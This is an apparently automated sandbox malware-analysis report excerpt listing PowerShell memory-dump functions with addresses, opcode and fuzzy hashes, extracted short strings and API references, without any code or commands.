Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: b19c3448b753754b05fd9ed6cecdaae20f45da3a2ca6e3aea4f509214338872c
Instruction ID: b0d826820ff6706c9ca839af0eac5f28ef36e1b9634f00341196ff83d65a0772
Opcode Fuzzy Hash: b19c3448b753754b05fd9ed6cecdaae20f45da3a2ca6e3aea4f509214338872c
Instruction Fuzzy Hash: 50514A30B002188FDB24DF68D854B9DBBB2FF88304F1185A9E549AB395DB71AD45CB92

Function 040A3870 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d881bcb96651541cf1ec90adefc730b4272f176fc854830e9d33ba27205dba
Instruction ID: c7eba8970363ee670a6fd54a626e41f4e622fc6e50276c164e8cfedeadd1968a
Opcode Fuzzy Hash: e0d881bcb96651541cf1ec90adefc730b4272f176fc854830e9d33ba27205dba
Instruction Fuzzy Hash: 75D1F274A00219AFCB54CF98D584A9EFBF2FF88310F248159E805AB365C735ED95CB90

Function 040A2FF0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f70547e8e56641dc518e3cbe88f27ba615cd9c4ad2d356dcd5339cf37f59b4
Instruction ID: 3c96656148131ac80802944cfda789edf6af3e744bc7ff016fd98a4ede98e391
Opcode Fuzzy Hash: 06f70547e8e56641dc518e3cbe88f27ba615cd9c4ad2d356dcd5339cf37f59b4
Instruction Fuzzy Hash: 06A18CB4A002058FCB14CF9DC5949AABBF1FF89314B2485A9E915AB365C736FC51CFA0

Function 040A3100 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1c721383c29c5afcfaeaeb12a74fd4b2ed7559bbf23d67b32894e7d180afb0
Instruction ID: 0d37be9071e0afce55819227987f35cad32906ec55bbcc819f4ee9a21ff3ed54
Opcode Fuzzy Hash: 1f1c721383c29c5afcfaeaeb12a74fd4b2ed7559bbf23d67b32894e7d180afb0
Instruction Fuzzy Hash: 6F4138B4A005059FCB09CF98C5989AAFBB1FF88314B1585A9D815AB364C736FD60CFA0

Function 040A3861 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac1b1764d4ff268117f0ed176ff3dd0782542b2b22189de0dee7df56a7c118b
Instruction ID: c1187161dbfcbb0a821401ceb019967c5ce3d63f50801cbc4b5d77139955c267
Opcode Fuzzy Hash: bac1b1764d4ff268117f0ed176ff3dd0782542b2b22189de0dee7df56a7c118b
Instruction Fuzzy Hash: FA210374A002099FCB44CF99C4849AAFBB1FF48310B2485A9E909EB725C731FC51CBA0

Function 0072D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699464421.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25dd1c188e58d3b788fdcc84833e39a20127df838a495a7673ae8d2cea7cd356
Instruction ID: 7996eac7cfcd1c9dd1266afd93a5215ff6cd0bfd7ecdbf01bffa314616b78d60
Opcode Fuzzy Hash: 25dd1c188e58d3b788fdcc84833e39a20127df838a495a7673ae8d2cea7cd356
Instruction Fuzzy Hash: 46012B311093109AE7304A26DD84767BF98DF45324F18C42AED484B156C27DDC45C6B1

Function 0072D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699464421.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad03b0919a994309f8c19b907396d19db9255601d5e2bbc789b57887b18e645
Instruction ID: 3bc06433b9ccf3a45c939aca43ade7a63acf2adde73e5c079e86ec0bcbff8bac
Opcode Fuzzy Hash: 3ad03b0919a994309f8c19b907396d19db9255601d5e2bbc789b57887b18e645
Instruction Fuzzy Hash: E9F0F072009350AEE7208E1ADDC4B63FFA8EF55334F18C45AED488F296C2799C44CAB0

Function 040A96BF Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d95e22d6122ceeb66cf6b7e37f37703a41dfcd26536c79f5e9213093f2f5a8
Instruction ID: 43d9cabee50dbd341cfe81b65dbefe5f56ee9a16f79da12bc296d8e0f9017c61
Opcode Fuzzy Hash: e9d95e22d6122ceeb66cf6b7e37f37703a41dfcd26536c79f5e9213093f2f5a8
Instruction Fuzzy Hash: A2E026B4E0520E9F8F48DFF995425BEFFF5AB48200F10896E9819E3350EA3456518FE5

Function 040A96C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b254a34d9040855ffd12308c8380dc2ff6b19ed3e2e48664ab1e58fa692d0b
Instruction ID: 1d0edd1a17c13791a048da224caaa7e18cf13405102a7a63ee4cd55144b2ce5c
Opcode Fuzzy Hash: 95b254a34d9040855ffd12308c8380dc2ff6b19ed3e2e48664ab1e58fa692d0b
Instruction Fuzzy Hash: 2EE026B4E0420E9F8F48DFF995425BEFBF5AB48200F10896E9819E3350E63456518FA5

Function 040A9682 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b94c30189fec01990d588241eeee1ddfdbbcdaaad0be7d02e60141ef757bf4c
Instruction ID: 0ae79858fc93b02b14000da3ac7c825775a403e1648fd43740eccbb7c9f78740
Opcode Fuzzy Hash: 1b94c30189fec01990d588241eeee1ddfdbbcdaaad0be7d02e60141ef757bf4c
Instruction Fuzzy Hash: 0CC012B0649345D7C2195AE590082A877A95B00241F080444D20661853D762E071C9B2

Function 040A968F Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dc8d9c3cad9868176138b42ca7cf2667d5fb49342202d058d14bb1944515c4
Instruction ID: be40929448aa892033d0d4f9b1aea01958a011e782415771becd73b78b330384
Opcode Fuzzy Hash: c7dc8d9c3cad9868176138b42ca7cf2667d5fb49342202d058d14bb1944515c4
Instruction Fuzzy Hash: 06B092A064A78896D32992F5A4097E57AAE1B40255F480485A34924C53AA67B4F0C6F6

Analysis Process: powershell.exePID: 2108, Parent PID: 7164COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.1%
Total number of Nodes:	99
Total number of Limit Nodes:	0

Executed Functions

Function 06BD3370 Relevance: 16.2, Strings: 12, Instructions: 1210COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD3CBA
$^q, xrefs: 06BD37D7
$^q, xrefs: 06BD3C51
$^q, xrefs: 06BD3C61
$^q, xrefs: 06BD3887
$^q, xrefs: 06BD3603
$^q, xrefs: 06BD3CAA
$^q, xrefs: 06BD3613
$^q, xrefs: 06BD3877
4, xrefs: 06BD3D55
,bq, xrefs: 06BD3E3A
$^q, xrefs: 06BD37C7

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 20a8fcdba04a18adc102fe69267c3ab4afcb4a82023ab1c6565b62ad12ef1cc4
Instruction ID: 9611c797277b9a32c1a9835e214adfac8434fb80ed7d7c301728fcadccba9728
Opcode Fuzzy Hash: 20a8fcdba04a18adc102fe69267c3ab4afcb4a82023ab1c6565b62ad12ef1cc4
Instruction Fuzzy Hash: 3BB22774A002288FDB54CFA8C884AADBBF6FF49700F1481A9E505AF3A5DB719C85CF51

Function 06BD36A7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD3C51
$^q, xrefs: 06BD3CAA
$^q, xrefs: 06BD3877
4, xrefs: 06BD3D55
,bq, xrefs: 06BD3E3A
$^q, xrefs: 06BD37C7

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: d6b4dcfdf9608bd2a038756fdab116a74bb6eecbffde1f7ef69654cfe40479f5
Instruction ID: 64d48660d17f5cd2c0f222661b7c232ee37db4ca468cbff2bc594da59489d6c3
Opcode Fuzzy Hash: d6b4dcfdf9608bd2a038756fdab116a74bb6eecbffde1f7ef69654cfe40479f5
Instruction Fuzzy Hash: 4C22F774A00228CFDB64CFA4C984BA9B7B2FB49700F1480E9D509AB3A5EB319D85CF51

Function 06C16980 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06C16D29

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: bc236b55f2ab012466668735ad33805376613bc78d4c843234377444b33117ec
Instruction ID: ef1b1eb474fc9d9c61ca44ee3ecc69b1e24643e1bcf22327c29320032660d9ef
Opcode Fuzzy Hash: bc236b55f2ab012466668735ad33805376613bc78d4c843234377444b33117ec
Instruction Fuzzy Hash: 66E11B70E05218CFEB54DFAAC944B9DBBF2FB8A304F2081A9D409AB355DB745A84DF41

Function 06C1F500 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06C1F576

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 09ff78836f02fdd642af2dbc18b9bea79156b3e172ce58f07662d67c62cb0292
Instruction ID: 321a834a3494bd2e3c5306e3178d46f59969a868a12825053a607c70b8020fc0
Opcode Fuzzy Hash: 09ff78836f02fdd642af2dbc18b9bea79156b3e172ce58f07662d67c62cb0292
Instruction Fuzzy Hash: 5A2106B1D002188FCB20DFAAC48469EFBF4EF89320F24842ED459A7250CB74A945CFA5

Function 06C1F508 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06C1F576

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4d0aad93f4c4a3a02411a265ea9ded760712e5fea69336e00f431d81fe363fcc
Instruction ID: 7c01faf511e106689334db289a4cf91b3392ace2f0838f414d8e645255599cab
Opcode Fuzzy Hash: 4d0aad93f4c4a3a02411a265ea9ded760712e5fea69336e00f431d81fe363fcc
Instruction Fuzzy Hash: D01114B1D002088FCB10DFAAC484B9EFBF4EF89320F14842ED459A7210CB78A944CFA5

Function 06C1697F Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06C16D29

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: c62aae2c8e8224b549e58e447bfe87b3849b75c636031182a2d9b43622d7d8c1
Instruction ID: f8c50b17c752eb6b2c3b8aec587fe6dac40e21d7a1593d8262e6985db6af6061
Opcode Fuzzy Hash: c62aae2c8e8224b549e58e447bfe87b3849b75c636031182a2d9b43622d7d8c1
Instruction Fuzzy Hash: B0D12970E05218CFEB54DFAAC944B9DBBF2FB8A304F2081A9D409AB355DB745A84DF41

Function 06C47B48 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06C47C3D

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 6a10b3df5b93f8dc4b3d77c47598e89f8486e7a94b55296568e53395f14cc574
Instruction ID: 1586078d3460f735f189ef028f4078e1016f5fe95ea1de2e8ef833c09af14803
Opcode Fuzzy Hash: 6a10b3df5b93f8dc4b3d77c47598e89f8486e7a94b55296568e53395f14cc574
Instruction Fuzzy Hash: F6A1E670E15218CFEB54DFAAC984BADBBF2FF89304F109169E409A7251DB709985CF50

Function 06C47B39 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06C47C3D

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: a94a3fb9fbe05662c8f738f785d9ebf38678d589ac6d154c408a7e8a08f28dd8
Instruction ID: 3a6d9c2ad3ee021f8590fc82a23c318e5c04388d432a30cc99123335a171654a
Opcode Fuzzy Hash: a94a3fb9fbe05662c8f738f785d9ebf38678d589ac6d154c408a7e8a08f28dd8
Instruction Fuzzy Hash: 3EB1F574E15208CFEB54DFA9C984B9DBBF2FF89304F2081A9E409A7251DB709A85CF50

Function 06C071DB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99eff26abc3853f564a68a24be61f440b50c6e38ef248db2b10222a046faabb7
Instruction ID: 489c45ac745a1eacc997fb5551160ed20d9448d8a5dd65d3cad7fa27daed3668
Opcode Fuzzy Hash: 99eff26abc3853f564a68a24be61f440b50c6e38ef248db2b10222a046faabb7
Instruction Fuzzy Hash: 1F52B474A042288FDB64DF28CD84B9ABBB5FB89301F1081D9E90DA7355DB34AE85CF54

Function 06C0B738 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f44da6a8355f5b9e05fe44332fde85d57e4f2809603210df9b19771e7f38146
Instruction ID: afc44f84e86a2c0ddc69afa3b58816246d304d5e2df5cac0b50db3705152287c
Opcode Fuzzy Hash: 5f44da6a8355f5b9e05fe44332fde85d57e4f2809603210df9b19771e7f38146
Instruction Fuzzy Hash: B671D470D052188FEB54CFAAD944B9DBBF2AF89300F1081AAD409AB365DB355E85CF40

Function 06C0B77F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19bacd9545895ce9291f69cc9998279bb244d74f15184db8aa34c7d0c1a0096
Instruction ID: c23f70ce2c1f52c4c7484b2b7b65dfe5ea34ce2424b7c1f3a67e2e4de4c30bd9
Opcode Fuzzy Hash: e19bacd9545895ce9291f69cc9998279bb244d74f15184db8aa34c7d0c1a0096
Instruction Fuzzy Hash: D561C674D052288FEB64CF6AD9447DDBBF2AF89300F1081AAD409A7365DB755E85CF40

Function 06C0B790 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d251ad2d901fe36a6dde65fdc4457de30fef2c2cbca045a3afc3bd7fc8dc4fd5
Instruction ID: 9929c65592405a6e4383f939178dcf17a07cb9dc41ae2fc628be990d1136290c
Opcode Fuzzy Hash: d251ad2d901fe36a6dde65fdc4457de30fef2c2cbca045a3afc3bd7fc8dc4fd5
Instruction Fuzzy Hash: 1F61A370D052288FEB64CFAAD944BDDBBF2AF89310F1081AAD409A7365DB755E85CF40

Function 07195E78 Relevance: 34.6, Strings: 27, Instructions: 824COMMON

Download Yara Rule

Strings

$^q, xrefs: 07196600
4'^q, xrefs: 07196053
tP^q, xrefs: 07196542
$^q, xrefs: 071961E7
$^q, xrefs: 07195E8A
4'^q, xrefs: 0719605F
$^q, xrefs: 07195EB9
$^q, xrefs: 071964A4
$^q, xrefs: 071964B2
$^q, xrefs: 07195EAB
$^q, xrefs: 07196466
$^q, xrefs: 07196482
$^q, xrefs: 071961C6
$^q, xrefs: 07196273
4'^q, xrefs: 0719663C
$^q, xrefs: 07196445
$^q, xrefs: 07196283
tP^q, xrefs: 071967DB
4'^q, xrefs: 071962A2
4'^q, xrefs: 07196630
4'^q, xrefs: 071962AE
$^q, xrefs: 0719620E
tP^q, xrefs: 071967CF
tP^q, xrefs: 0719654E
$^q, xrefs: 0719621E
$^q, xrefs: 07196610
$^q, xrefs: 0719674C

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-4260405320
Opcode ID: 0da44c701336978c12fa4a8b225a7482081bacf1fba3007ea17c01064728e1b7
Instruction ID: 9626656db688df01e3079b19d45e01c9cc2646392e5079137e454a4627ee654f
Opcode Fuzzy Hash: 0da44c701336978c12fa4a8b225a7482081bacf1fba3007ea17c01064728e1b7
Instruction Fuzzy Hash: 3A52F7B1B0020ADFDF1A8F69D5446AABBF2AF85710F18847AD4058F2D5DB31DC46CBA1

Function 071970E0 Relevance: 25.6, Strings: 20, Instructions: 625COMMON

Download Yara Rule

Strings

$^q, xrefs: 071975CE
tP^q, xrefs: 07197440
$^q, xrefs: 071975F5
$^q, xrefs: 071973E9
tP^q, xrefs: 071977E7
$^q, xrefs: 07197254
(o^q, xrefs: 07197630
4'^q, xrefs: 071972AE
$^q, xrefs: 07197186
$^q, xrefs: 07197605
4'^q, xrefs: 071972A2
4'^q, xrefs: 07197785
$^q, xrefs: 071971C8
$^q, xrefs: 071971FF
$^q, xrefs: 071971EF
(o^q, xrefs: 07197640
$^q, xrefs: 07197264
tP^q, xrefs: 07197434
4'^q, xrefs: 07197791
tP^q, xrefs: 071977DB

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2087719723
Opcode ID: 107a646278694abb27dc90e28f19b07ecf91bf6fe2245c48fc4b94a361e256ca
Instruction ID: 87abd1b7542687dbe3bca352ebcbfb367411bef8902f4b7630206c3c27120b2d
Opcode Fuzzy Hash: 107a646278694abb27dc90e28f19b07ecf91bf6fe2245c48fc4b94a361e256ca
Instruction Fuzzy Hash: 5B22FA71B2420ADFDF1A8F68D8447AA7BB2BF85710F14847AE8058F2D1DB31D946C7A1

Function 07198328 Relevance: 21.3, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

$^q, xrefs: 071991F1
$^q, xrefs: 071991E5
4'^q, xrefs: 07198836
4'^q, xrefs: 0719882A
$^q, xrefs: 071991AB
$^q, xrefs: 07198E7B
4'^q, xrefs: 07198CD3
4'^q, xrefs: 0719920D
$^q, xrefs: 07198E53
4'^q, xrefs: 07198E92
4'^q, xrefs: 07199059
4'^q, xrefs: 07198E9E
4'^q, xrefs: 07198CDF
4'^q, xrefs: 07199219
$^q, xrefs: 07198E6F
4'^q, xrefs: 0719904D

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1828690331
Opcode ID: 21f21182217d1887a8bd59228724ae5b3b25e9f41630234cf2493eedaa94f08a
Instruction ID: a9336523e0e7796e2b7c9ac08b2b27b6a64b22474e15eb618ad676b718f97069
Opcode Fuzzy Hash: 21f21182217d1887a8bd59228724ae5b3b25e9f41630234cf2493eedaa94f08a
Instruction Fuzzy Hash: 6CA2C1B4B00305DFCF25CB69D944A6ABBE6AFC6310F14847AD4059B395DB32E847CB92

Function 072C10A8 Relevance: 17.3, Strings: 13, Instructions: 1059COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072C1765
4'^q, xrefs: 072C14BD
$^q, xrefs: 072C1A4C
4'^q, xrefs: 072C18D4
4'^q, xrefs: 072C14C7
$^q, xrefs: 072C15A2
4'^q, xrefs: 072C1759
$^q, xrefs: 072C1CD4
4'^q, xrefs: 072C18E0
$^q, xrefs: 072C15C3
$^q, xrefs: 072C15D1
$^q, xrefs: 072C1CDE
$^q, xrefs: 072C1A56

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-928407100
Opcode ID: 1d354630ee65c3fa8eb619ed863b8f4be5805ff521661dd6ba50f04134906ac2
Instruction ID: ea216ba929c3a055604ea6617f5f7de460f8ec471b73edccd78058ba4ed62960
Opcode Fuzzy Hash: 1d354630ee65c3fa8eb619ed863b8f4be5805ff521661dd6ba50f04134906ac2
Instruction Fuzzy Hash: 13726BF0B2434ACFC715CB39881266ABFA6AFA6210F1885AFD445CF257DA31C855C792

Function 0719A830 Relevance: 12.4, Strings: 9, Instructions: 1130COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0719B496
tP^q, xrefs: 0719B3E1
$^q, xrefs: 0719B616
4'^q, xrefs: 0719B687
$^q, xrefs: 0719B608
4'^q, xrefs: 0719B48A
tP^q, xrefs: 0719B3D5
$^q, xrefs: 0719B5E3
4'^q, xrefs: 0719B693

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2378468523
Opcode ID: 7049faec71f47aac715be5f74dea2c5063bda98c4e3f96384551716287e781dc
Instruction ID: 8baaa9e37c713c5d97dfd8d72bf08a849c9b101be40298386709057a1c1cfbf2
Opcode Fuzzy Hash: 7049faec71f47aac715be5f74dea2c5063bda98c4e3f96384551716287e781dc
Instruction Fuzzy Hash: 20928EB4B043059FDB25CB68D944A6ABBB2BF85314F14C47AD4099F395CB32EC46CB91

Function 072C2D78 Relevance: 7.8, Strings: 6, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 072C2E51
$^q, xrefs: 072C2E13
$^q, xrefs: 072C2E45
4'^q, xrefs: 072C2E80
], xrefs: 072C3087
4'^q, xrefs: 072C2E8C

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$]$$^q$$^q$$^q
API String ID: 0-2994288445
Opcode ID: 520604f5c3c14d215a9bb3765b247abbf3056fe42e813b9a003a93f0965236f7
Instruction ID: 7371227b301b323a860a4f93159b398eaac362637cc4ba8656a274be90de2556
Opcode Fuzzy Hash: 520604f5c3c14d215a9bb3765b247abbf3056fe42e813b9a003a93f0965236f7
Instruction Fuzzy Hash: D39149B1B2434ACFDB15DA38880066ABBE5BFA6210F1485BFD005CB256DF32D946C793

Function 072C2238 Relevance: 6.7, Strings: 5, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 072C2698
$^q, xrefs: 072C2492
$^q, xrefs: 072C24C1
4'^q, xrefs: 072C26A4
$^q, xrefs: 072C24B3

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 8efcb489fe5a50dcef2409e40721111224379b0a30b6e5f289577e1cd06ebdd6
Instruction ID: 95bf945d94d1aba2be447ec667374826a290ad6c30737a3ba3f1db9d8806a149
Opcode Fuzzy Hash: 8efcb489fe5a50dcef2409e40721111224379b0a30b6e5f289577e1cd06ebdd6
Instruction Fuzzy Hash: A7E126B1724306CFDB25CB78981066ABBE6BFA5210F1885AED505CF395DE32C845C7A3

Function 072C2830 Relevance: 6.6, Strings: 5, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 072C2C3B
4'^q, xrefs: 072C2C47
$^q, xrefs: 072C29F8
$^q, xrefs: 072C2A02
$^q, xrefs: 072C28A3

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

